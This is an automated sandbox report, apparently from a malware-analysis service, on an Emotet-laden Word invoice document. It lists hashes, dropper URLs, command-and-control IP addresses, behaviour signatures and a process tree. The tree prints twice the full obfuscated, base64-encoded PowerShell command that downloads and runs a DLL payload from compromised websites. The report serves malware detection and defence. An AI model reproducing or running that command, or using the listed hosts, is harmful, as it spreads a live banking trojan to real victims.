Analysis

  • max time kernel
    128s
  • max time network
    139s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    15-02-2021 15:02

General

  • Target

    INV895212 200121.doc

  • Size

    158KB

  • MD5

    67c9e5cb7f3d94b57b015f898e47f7ae

  • SHA1

    6b15c55ddc7bd8fd48847f99469e60cb8b376f63

  • SHA256

    7b8c40801574e57e1e8ec63d7ef48d8072a41b95e548f7b140744017b2b3c0f3

  • SHA512

    5bf584e06564664ea022cf992e6c54ee58ba91d1bf7e4dc31b9604ace0f99b9f6d441021fa6c9709b14762743806daae668d7eb4297be74890a7f8d3795d0f57

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://zhongsijiacheng.com/wp-content/jn5/

exe.dropper

http://artistascitizen.com/wp-content/Bx3cr6/

exe.dropper

http://ombchardin.com/archive/V/

exe.dropper

https://apsolution.work/magneti-marelli-zkkmb/toq7Eiy/

exe.dropper

https://happycheftv.com/wp-admin/z6uGcbY/

exe.dropper

https://careercoachconnection.com/tenderometer/4K/

exe.dropper

https://tacademicos.com/content/JbF68i/

Extracted

Family

emotet

Botnet

Epoch1

C2

181.10.46.92:80

2.58.16.88:8080

206.189.232.2:8080

178.250.54.208:8080

167.71.148.58:443

202.134.4.210:7080

187.162.248.237:80

78.206.229.130:80

85.214.26.7:8080

5.196.35.138:7080

1.226.84.243:8080

110.39.162.2:443

185.183.16.47:80

152.231.89.226:80

138.97.60.141:7080

94.176.234.118:443

46.101.58.37:8080

93.146.143.191:80

70.32.84.74:8080

137.74.106.111:7080

rsa_pubkey.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Loads dropped DLL 8 IoCs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 37 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\INV895212 200121.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1932
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAFYAIAAgACgAIgBPAGsAIgArACIAQQAiACkAIAAgACgAIABbAHQAeQBQAGUAXQAoACIAewA2AH0AewA0AH0AewAzAH0AewAwAH0AewA1AH0AewAxAH0AewAyAH0AIgAtAGYAJwBpACcALAAnAEkAUgBlACcALAAnAGMAVABvAHIAeQAnACwAJwBlAG0ALgAnACwAJwBzAHQAJwAsACcAbwAuAEQAJwAsACcAUwB5ACcAKQApADsAIAAgACAAIAAkAEEAWgAxAEMAIAAgAD0AIAAgAFsAdABZAHAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADUAfQAiAC0ARgAgACcAcABvAGkATgBUAG0AQQBuACcALAAnAGUAdAAuACcALAAnAEUAbQAuAE4AJwAsACcAcwB5AFMAVAAnACwAJwBzAEUAcgBWAGkAYwBFACcALAAnAEEARwBlAFIAJwApACAAOwAgACQAWQBsAHUANwB5AG8AcwA9ACQAWQBfADgAQwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUQAyADAAVwA7ACQAUAA5ADQASgA9ACgAKAAnAFQANQAnACsAJwBfACcAKQArACcAQwAnACkAOwAgACgAIAAgAEQASQByACAAKAAnAFYAYQAnACsAJwByAEkAQQBCACcAKwAnAEwARQA6AE8AJwArACcAawBBACcAKQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBjAHIARQBgAEEAdABgAGUAZABJAHIARQBjAGAAVABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAdwBzACcAKwAnAEEAJwApACsAKAAnAEMAcwA0ACcAKwAnAGMAMwB2ACcAKQArACgAJwBsACcAKwAnAHcAcwBBAFUAJwApACsAKAAnAHAAeQB1AG0AJwArACcAOAAnACkAKwAoACcAMAAnACsAJwB3AHMAQQAnACkAKQAuACIAcgBFAFAAYABMAGEAQwBFACIAKAAoACcAdwAnACsAJwBzAEEAJwApACwAJwBcACcAKQApACkAOwAkAFYAMQA1AFcAPQAoACcARgA1ACcAKwAnADEARwAnACkAOwAgACgAIABHAGMAaQAgACgAJwBWAGEAUgBJAGEAJwArACcAQgAnACsAJwBMAGUAOgAnACsAJwBBAHoAMQBDACcAKQAgACkALgB2AGEATABVAEUAOgA6ACIAcwBlAGMAdQBgAFIAaQBgAFQAeQBgAHAAYABSAE8AVABPAEMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAJwArACcAMQAyACcAKQApADsAJABVADEANABSAD0AKAAnAFQAJwArACgAJwA5ACcAKwAnADUARgAnACkAKQA7ACQARAA3AHMAaAA4AHgAZgAgAD0AIAAoACcASgAnACsAKAAnAF8AMwAnACsAJwBRACcAKQApADsAJABPADMANQBRAD0AKAAnAEUANQAnACsAJwA5AE8AJwApADsAJABVADEAawB0AGMANwBpAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AQwBzACcAKwAnADQAYwAzAHYAbAB7ACcAKwAnADAAfQAnACsAJwBVAHAAJwArACgAJwB5ACcAKwAnAHUAbQAnACkAKwAnADgAMAAnACsAJwB7ACcAKwAnADAAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABEADcAcwBoADgAeABmACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABXADYAOQBZAD0AKAAoACcARwAxACcAKwAnADcAJwApACsAJwBOACcAKQA7ACQATAByADIAaABzADkANwA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEsAYQA3ADQAcAA1AGUAPQAoACcAcwAnACsAKAAnAGcAIAB5ACcAKwAnAHcAJwApACsAKAAnACAAYQAnACsAJwBoADoALwAnACsAJwAvACcAKQArACcAegAnACsAKAAnAGgAbwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnAHMAaQBqAGkAJwArACcAYQBjACcAKQArACgAJwBoACcAKwAnAGUAbgBnACcAKwAnAC4AYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AdwBwAC0AYwAnACsAJwBvAG4AdABlAG4AJwArACcAdAAnACkAKwAoACcALwBqAG4ANQAvACEAJwArACcAcwAnACsAJwBnACcAKQArACcAIAB5ACcAKwAnAHcAJwArACgAJwAgAGEAaAA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAYQByACcAKwAnAHQAaQBzACcAKQArACgAJwB0AGEAJwArACcAcwBjACcAKQArACgAJwBpAHQAaQB6ACcAKwAnAGUAbgAuAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGMAbwAnACsAJwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0ACcAKQArACgAJwAvAEIAeAAzACcAKwAnAGMAcgA2AC8AJwApACsAKAAnACEAcwBnACcAKwAnACAAJwApACsAJwB5ACcAKwAnAHcAIAAnACsAKAAnAGEAJwArACcAaAA6AC8ALwBvAG0AJwArACcAYgBjAGgAYQByACcAKwAnAGQAaQBuAC4AJwApACsAKAAnAGMAbwBtAC8AYQByAGMAJwArACcAaAAnACkAKwAnAGkAJwArACgAJwB2AGUAJwArACcALwBWACcAKwAnAC8AIQAnACsAJwBzAGcAIAAnACsAJwB5AHcAIABhAGgAJwApACsAKAAnAHMAOgAvAC8AYQBwACcAKwAnAHMAbwBsACcAKwAnAHUAdAAnACsAJwBpAG8AJwArACcAbgAnACkAKwAoACcALgAnACsAJwB3AG8AcgAnACkAKwAoACcAawAnACsAJwAvAG0AYQBnAG4AZQAnACkAKwAnAHQAJwArACgAJwBpAC0AbQBhACcAKwAnAHIAJwArACcAZQBsAGwAJwApACsAKAAnAGkAJwArACcALQB6AGsAJwArACcAawAnACsAJwBtAGIALwB0AG8AcQA3AEUAaQB5ACcAKwAnAC8AJwApACsAJwAhACcAKwAnAHMAZwAnACsAJwAgACcAKwAoACcAeQB3ACAAJwArACcAYQBoAHMAOgAnACsAJwAvAC8AaAAnACkAKwAnAGEAJwArACgAJwBwAHAAeQAnACsAJwBjACcAKwAnAGgAZQAnACsAJwBmAHQAdgAuAGMAbwBtAC8AJwArACcAdwBwAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAHoANgAnACkAKwAoACcAdQBHAGMAJwArACcAYgAnACsAJwBZAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAaABzADoALwAnACsAJwAvAGMAYQByACcAKwAnAGUAJwApACsAJwBlAHIAJwArACcAYwAnACsAKAAnAG8AYQBjAGgAYwBvAG4AJwArACcAbgAnACkAKwAnAGUAJwArACcAYwAnACsAKAAnAHQAaQBvACcAKwAnAG4AJwArACcALgBjAG8AbQAvACcAKwAnAHQAJwArACcAZQBuAGQAZQByACcAKQArACgAJwBvACcAKwAnAG0AZQAnACkAKwAoACcAdABlAHIALwA0AEsAJwArACcALwAnACsAJwAhAHMAJwApACsAKAAnAGcAJwArACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAcwA6AC8ALwAnACkAKwAnAHQAYQAnACsAJwBjACcAKwAoACcAYQBkAGUAJwArACcAbQBpAGMAJwArACcAbwBzAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AYwBvACcAKwAnAG4AJwApACsAKAAnAHQAZQBuACcAKwAnAHQALwBKAGIARgA2ADgAJwArACcAaQAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBDAGUAIgAoACgAJwBzACcAKwAoACcAZwAgACcAKwAnAHkAJwApACsAKAAnAHcAJwArACcAIABhAGgAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEwAcgAyAGgAcwA5ADcALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBgAFAAbABJAFQAIgAoACQATwA1ADgATAAgACsAIAAkAFkAbAB1ADcAeQBvAHMAIAArACAAJABBAF8AOQBSACkAOwAkAFcAMAAwAFcAPQAoACcAWgBfACcAKwAnADYASgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQBmAGMAdgBjADYAIABpAG4AIAAkAEsAYQA3ADQAcAA1AGUAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAtAE8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBTAFQARQBNAC4ATgBFAHQALgBXAEUAQgBjAEwASQBlAE4AdAApAC4AIgBEAE8AYAB3AG4AbABPAEEARABgAEYAaQBgAEwARQAiACgAJABOAGUAZgBjAHYAYwA2ACwAIAAkAFUAMQBrAHQAYwA3AGkAKQA7ACQATAAzADkAUQA9ACgAJwBIACcAKwAoACcAXwA1ACcAKwAnAEMAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVQAxAGsAdABjADcAaQApAC4AIgBMAGAAZQBOAGAARwBUAGgAIgAgAC0AZwBlACAAMwAzADUANwAxACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsACcAKwAnADMAMgAnACkAIAAkAFUAMQBrAHQAYwA3AGkALAAoACgAJwBBACcAKwAnAG4AeQAnACkAKwAoACcAUwB0AHIAaQAnACsAJwBuACcAKQArACcAZwAnACkALgAiAHQATwBTAHQAYABSAGAAaQBOAGcAIgAoACkAOwAkAEoAOAAzAEsAPQAoACcATwAnACsAKAAnAF8AJwArACcANwBYACcAKQApADsAYgByAGUAYQBrADsAJABRADIANgBFAD0AKAAnAFIAXwAnACsAJwA0AEQAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQADMANQBZAD0AKAAoACcAUAAnACsAJwAxADUAJwApACsAJwBVACcAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1708
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:684
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IABTAFYAIAAgACgAIgBPAGsAIgArACIAQQAiACkAIAAgACgAIABbAHQAeQBQAGUAXQAoACIAewA2AH0AewA0AH0AewAzAH0AewAwAH0AewA1AH0AewAxAH0AewAyAH0AIgAtAGYAJwBpACcALAAnAEkAUgBlACcALAAnAGMAVABvAHIAeQAnACwAJwBlAG0ALgAnACwAJwBzAHQAJwAsACcAbwAuAEQAJwAsACcAUwB5ACcAKQApADsAIAAgACAAIAAkAEEAWgAxAEMAIAAgAD0AIAAgAFsAdABZAHAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADUAfQAiAC0ARgAgACcAcABvAGkATgBUAG0AQQBuACcALAAnAGUAdAAuACcALAAnAEUAbQAuAE4AJwAsACcAcwB5AFMAVAAnACwAJwBzAEUAcgBWAGkAYwBFACcALAAnAEEARwBlAFIAJwApACAAOwAgACQAWQBsAHUANwB5AG8AcwA9ACQAWQBfADgAQwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUQAyADAAVwA7ACQAUAA5ADQASgA9ACgAKAAnAFQANQAnACsAJwBfACcAKQArACcAQwAnACkAOwAgACgAIAAgAEQASQByACAAKAAnAFYAYQAnACsAJwByAEkAQQBCACcAKwAnAEwARQA6AE8AJwArACcAawBBACcAKQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBjAHIARQBgAEEAdABgAGUAZABJAHIARQBjAGAAVABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAdwBzACcAKwAnAEEAJwApACsAKAAnAEMAcwA0ACcAKwAnAGMAMwB2ACcAKQArACgAJwBsACcAKwAnAHcAcwBBAFUAJwApACsAKAAnAHAAeQB1AG0AJwArACcAOAAnACkAKwAoACcAMAAnACsAJwB3AHMAQQAnACkAKQAuACIAcgBFAFAAYABMAGEAQwBFACIAKAAoACcAdwAnACsAJwBzAEEAJwApACwAJwBcACcAKQApACkAOwAkAFYAMQA1AFcAPQAoACcARgA1ACcAKwAnADEARwAnACkAOwAgACgAIABHAGMAaQAgACgAJwBWAGEAUgBJAGEAJwArACcAQgAnACsAJwBMAGUAOgAnACsAJwBBAHoAMQBDACcAKQAgACkALgB2AGEATABVAEUAOgA6ACIAcwBlAGMAdQBgAFIAaQBgAFQAeQBgAHAAYABSAE8AVABPAEMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAJwArACcAMQAyACcAKQApADsAJABVADEANABSAD0AKAAnAFQAJwArACgAJwA5ACcAKwAnADUARgAnACkAKQA7ACQARAA3AHMAaAA4AHgAZgAgAD0AIAAoACcASgAnACsAKAAnAF8AMwAnACsAJwBRACcAKQApADsAJABPADMANQBRAD0AKAAnAEUANQAnACsAJwA5AE8AJwApADsAJABVADEAawB0AGMANwBpAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AQwBzACcAKwAnADQAYwAzAHYAbAB7ACcAKwAnADAAfQAnACsAJwBVAHAAJwArACgAJwB5ACcAKwAnAHUAbQAnACkAKwAnADgAMAAnACsAJwB7ACcAKwAnADAAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABEADcAcwBoADgAeABmACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABXADYAOQBZAD0AKAAoACcARwAxACcAKwAnADcAJwApACsAJwBOACcAKQA7ACQATAByADIAaABzADkANwA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEsAYQA3ADQAcAA1AGUAPQAoACcAcwAnACsAKAAnAGcAIAB5ACcAKwAnAHcAJwApACsAKAAnACAAYQAnACsAJwBoADoALwAnACsAJwAvACcAKQArACcAegAnACsAKAAnAGgAbwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnAHMAaQBqAGkAJwArACcAYQBjACcAKQArACgAJwBoACcAKwAnAGUAbgBnACcAKwAnAC4AYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AdwBwAC0AYwAnACsAJwBvAG4AdABlAG4AJwArACcAdAAnACkAKwAoACcALwBqAG4ANQAvACEAJwArACcAcwAnACsAJwBnACcAKQArACcAIAB5ACcAKwAnAHcAJwArACgAJwAgAGEAaAA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAYQByACcAKwAnAHQAaQBzACcAKQArACgAJwB0AGEAJwArACcAcwBjACcAKQArACgAJwBpAHQAaQB6ACcAKwAnAGUAbgAuAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGMAbwAnACsAJwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0ACcAKQArACgAJwAvAEIAeAAzACcAKwAnAGMAcgA2AC8AJwApACsAKAAnACEAcwBnACcAKwAnACAAJwApACsAJwB5ACcAKwAnAHcAIAAnACsAKAAnAGEAJwArACcAaAA6AC8ALwBvAG0AJwArACcAYgBjAGgAYQByACcAKwAnAGQAaQBuAC4AJwApACsAKAAnAGMAbwBtAC8AYQByAGMAJwArACcAaAAnACkAKwAnAGkAJwArACgAJwB2AGUAJwArACcALwBWACcAKwAnAC8AIQAnACsAJwBzAGcAIAAnACsAJwB5AHcAIABhAGgAJwApACsAKAAnAHMAOgAvAC8AYQBwACcAKwAnAHMAbwBsACcAKwAnAHUAdAAnACsAJwBpAG8AJwArACcAbgAnACkAKwAoACcALgAnACsAJwB3AG8AcgAnACkAKwAoACcAawAnACsAJwAvAG0AYQBnAG4AZQAnACkAKwAnAHQAJwArACgAJwBpAC0AbQBhACcAKwAnAHIAJwArACcAZQBsAGwAJwApACsAKAAnAGkAJwArACcALQB6AGsAJwArACcAawAnACsAJwBtAGIALwB0AG8AcQA3AEUAaQB5ACcAKwAnAC8AJwApACsAJwAhACcAKwAnAHMAZwAnACsAJwAgACcAKwAoACcAeQB3ACAAJwArACcAYQBoAHMAOgAnACsAJwAvAC8AaAAnACkAKwAnAGEAJwArACgAJwBwAHAAeQAnACsAJwBjACcAKwAnAGgAZQAnACsAJwBmAHQAdgAuAGMAbwBtAC8AJwArACcAdwBwAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAHoANgAnACkAKwAoACcAdQBHAGMAJwArACcAYgAnACsAJwBZAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAaABzADoALwAnACsAJwAvAGMAYQByACcAKwAnAGUAJwApACsAJwBlAHIAJwArACcAYwAnACsAKAAnAG8AYQBjAGgAYwBvAG4AJwArACcAbgAnACkAKwAnAGUAJwArACcAYwAnACsAKAAnAHQAaQBvACcAKwAnAG4AJwArACcALgBjAG8AbQAvACcAKwAnAHQAJwArACcAZQBuAGQAZQByACcAKQArACgAJwBvACcAKwAnAG0AZQAnACkAKwAoACcAdABlAHIALwA0AEsAJwArACcALwAnACsAJwAhAHMAJwApACsAKAAnAGcAJwArACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAcwA6AC8ALwAnACkAKwAnAHQAYQAnACsAJwBjACcAKwAoACcAYQBkAGUAJwArACcAbQBpAGMAJwArACcAbwBzAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AYwBvACcAKwAnAG4AJwApACsAKAAnAHQAZQBuACcAKwAnAHQALwBKAGIARgA2ADgAJwArACcAaQAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBDAGUAIgAoACgAJwBzACcAKwAoACcAZwAgACcAKwAnAHkAJwApACsAKAAnAHcAJwArACcAIABhAGgAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEwAcgAyAGgAcwA5ADcALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBgAFAAbABJAFQAIgAoACQATwA1ADgATAAgACsAIAAkAFkAbAB1ADcAeQBvAHMAIAArACAAJABBAF8AOQBSACkAOwAkAFcAMAAwAFcAPQAoACcAWgBfACcAKwAnADYASgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQBmAGMAdgBjADYAIABpAG4AIAAkAEsAYQA3ADQAcAA1AGUAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAtAE8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBTAFQARQBNAC4ATgBFAHQALgBXAEUAQgBjAEwASQBlAE4AdAApAC4AIgBEAE8AYAB3AG4AbABPAEEARABgAEYAaQBgAEwARQAiACgAJABOAGUAZgBjAHYAYwA2ACwAIAAkAFUAMQBrAHQAYwA3AGkAKQA7ACQATAAzADkAUQA9ACgAJwBIACcAKwAoACcAXwA1ACcAKwAnAEMAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVQAxAGsAdABjADcAaQApAC4AIgBMAGAAZQBOAGAARwBUAGgAIgAgAC0AZwBlACAAMwAzADUANwAxACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsACcAKwAnADMAMgAnACkAIAAkAFUAMQBrAHQAYwA3AGkALAAoACgAJwBBACcAKwAnAG4AeQAnACkAKwAoACcAUwB0AHIAaQAnACsAJwBuACcAKQArACcAZwAnACkALgAiAHQATwBTAHQAYABSAGAAaQBOAGcAIgAoACkAOwAkAEoAOAAzAEsAPQAoACcATwAnACsAKAAnAF8AJwArACcANwBYACcAKQApADsAYgByAGUAYQBrADsAJABRADIANgBFAD0AKAAnAFIAXwAnACsAJwA0AEQAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQADMANQBZAD0AKAAoACcAUAAnACsAJwAxADUAJwApACsAJwBVACcAKQA=
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1088
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll AnyString
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1928
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll AnyString
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1092
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll",#1
              5⤵
              • Loads dropped DLL
              • Drops file in System32 directory
              • Suspicious use of WriteProcessMemory
              PID:1744
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Khltpulo\agfonve.eop",NNolGpQ
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:896
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Khltpulo\agfonve.eop",#1
                  7⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1892

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
      MD5

      782f98c00905f1b80f0dfc6dc287cd6e

      SHA1

      6575caf3d68d899e83c4b352e985f86b53e804c7

      SHA256

      06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

      SHA512

      cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

    • \Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
      MD5

      782f98c00905f1b80f0dfc6dc287cd6e

      SHA1

      6575caf3d68d899e83c4b352e985f86b53e804c7

      SHA256

      06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

      SHA512

      cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

    • \Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
      MD5

      782f98c00905f1b80f0dfc6dc287cd6e

      SHA1

      6575caf3d68d899e83c4b352e985f86b53e804c7

      SHA256

      06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

      SHA512

      cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

    • \Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
      MD5

      782f98c00905f1b80f0dfc6dc287cd6e

      SHA1

      6575caf3d68d899e83c4b352e985f86b53e804c7

      SHA256

      06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

      SHA512

      cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

    • \Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
      MD5

      782f98c00905f1b80f0dfc6dc287cd6e

      SHA1

      6575caf3d68d899e83c4b352e985f86b53e804c7

      SHA256

      06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

      SHA512

      cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

    • \Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
      MD5

      782f98c00905f1b80f0dfc6dc287cd6e

      SHA1

      6575caf3d68d899e83c4b352e985f86b53e804c7

      SHA256

      06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

      SHA512

      cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

    • \Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
      MD5

      782f98c00905f1b80f0dfc6dc287cd6e

      SHA1

      6575caf3d68d899e83c4b352e985f86b53e804c7

      SHA256

      06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

      SHA512

      cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

    • \Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
      MD5

      782f98c00905f1b80f0dfc6dc287cd6e

      SHA1

      6575caf3d68d899e83c4b352e985f86b53e804c7

      SHA256

      06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

      SHA512

      cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

    • \Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll
      MD5

      782f98c00905f1b80f0dfc6dc287cd6e

      SHA1

      6575caf3d68d899e83c4b352e985f86b53e804c7

      SHA256

      06040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf

      SHA512

      cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6

    • memory/684-5-0x0000000000000000-mapping.dmp
    • memory/896-35-0x0000000000000000-mapping.dmp
    • memory/1088-16-0x000000001ADD0000-0x000000001ADD1000-memory.dmp
      Filesize

      4KB

    • memory/1088-14-0x0000000002320000-0x0000000002321000-memory.dmp
      Filesize

      4KB

    • memory/1088-15-0x000000001AC60000-0x000000001AC61000-memory.dmp
      Filesize

      4KB

    • memory/1088-13-0x0000000002550000-0x0000000002551000-memory.dmp
      Filesize

      4KB

    • memory/1088-12-0x000000001AEA4000-0x000000001AEA6000-memory.dmp
      Filesize

      8KB

    • memory/1088-7-0x000007FEFB541000-0x000007FEFB543000-memory.dmp
      Filesize

      8KB

    • memory/1088-11-0x000000001AEA0000-0x000000001AEA2000-memory.dmp
      Filesize

      8KB

    • memory/1088-8-0x000007FEF4CF0000-0x000007FEF56DC000-memory.dmp
      Filesize

      9.9MB

    • memory/1088-6-0x0000000000000000-mapping.dmp
    • memory/1088-9-0x00000000022D0000-0x00000000022D1000-memory.dmp
      Filesize

      4KB

